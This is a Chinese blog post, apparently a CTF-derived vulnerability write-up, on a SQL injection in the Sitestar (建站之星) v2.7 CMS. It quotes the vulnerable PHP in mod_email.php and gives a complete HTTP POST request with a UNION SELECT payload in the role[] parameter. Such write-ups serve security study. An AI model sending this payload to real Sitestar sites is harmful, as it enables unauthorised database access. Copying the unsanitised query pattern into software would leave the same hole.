Loading

建站之星v2.7SQL注入

CTF比赛中出了这个CMS的题 下载回源码看了下

问题出在module/mod_email.php第147行左右

public function do_mail(){
           global $db;
        $title = ParamHolder::get("title");
        $msg = ParamHolder::get("email_s");
        $msg .= ParamHolder::get("email_m");
        $roles = ParamHolder::get("role");
        $type = ParamHolder::get("type");
        $user_email = ParamHolder::get('users'); 
        $send_id = SessionHolder::get("user/id");
        $time = time();
        $ok = 0;
    .............省略
        else{//邮件群发
            foreach ($roles as $k=>$row){
                $sql = "select id,login,email from ".Config::$tbl_prefix."users where s_role='{".$row."}'";
                $res = $db->query($sql);
                $emails = $res->fetchRows();
                if (!empty($emails)) {
                    foreach ($emails as $eml){
                        if($this->send_mail($title,$msg,$eml['email'])){
                            $ok++;
                            $sql = "insert into ".Config::$tbl_prefix."emails(`title`,`content`,user_id,user_name,is_mail,send_id,is_read,is_ok,create_time) values('{$title}','{$msg}','{$eml['id']}','{$eml['login']}',1,{$send_id},0,1,'{$time}')";
                            $db->query($sql);
                        }else{
                            $sql = "insert into ".Config::$tbl_prefix."emails(`title`,`content`,user_id,user_name,is_mail,send_id,is_read,is_ok,create_time) values('{$title}','{$msg}','{$eml['id']}','{$eml['login']}',1,{$send_id},0,0,'{$time}')";
                            $db->query($sql);
                            $s_err[] = $eml['login'];
                        }
                    }
                }else{

SQL语句$sql = "select id,login,email from ".Config::$tbl_prefix."users where s_role='{".$row."}'";

其中SQL语句中的$row为遍历$roles后的内容,没有做过滤导致SQL注入

Payload:

POST /index.php?_a=do_mail&_m=mod_email HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Host: localhost
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Content-Length: 112
title=aa&email_s=a&email_m=a&type=a&users=aaaa'|aaa&role[]=abdc}'+union+select+
1,user(),3#

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明出处!
本文地址:https://0x20h.com/p/2642571319.html
Sp4ce's Blog 建站之星v2.7SQL注入

 上一篇
2018年XNUCA Web部分WriteUp 2018年XNUCA Web部分WriteUp
2018年XNUCA部分WriteUp 虐心+被侮辱智商 WEBezdotso<?php $param = array(); parse_str($_SERVER['QUERY_STRING']); if (isset($actio
2018-11-27
下一篇 
FBCTF汉化 基于Ubuntu 16.04 FBCTF汉化 基于Ubuntu 16.04
适用于FBCTF Ubuntu 16.04版本的汉化+做了点美化+修复个BUG直接上图 首页 注册 登录 后台 游戏版图 计分板 下载地址https://github.com/NS-Sp4ce/FBCTF-Chinese-Version
2018-11-14
  目录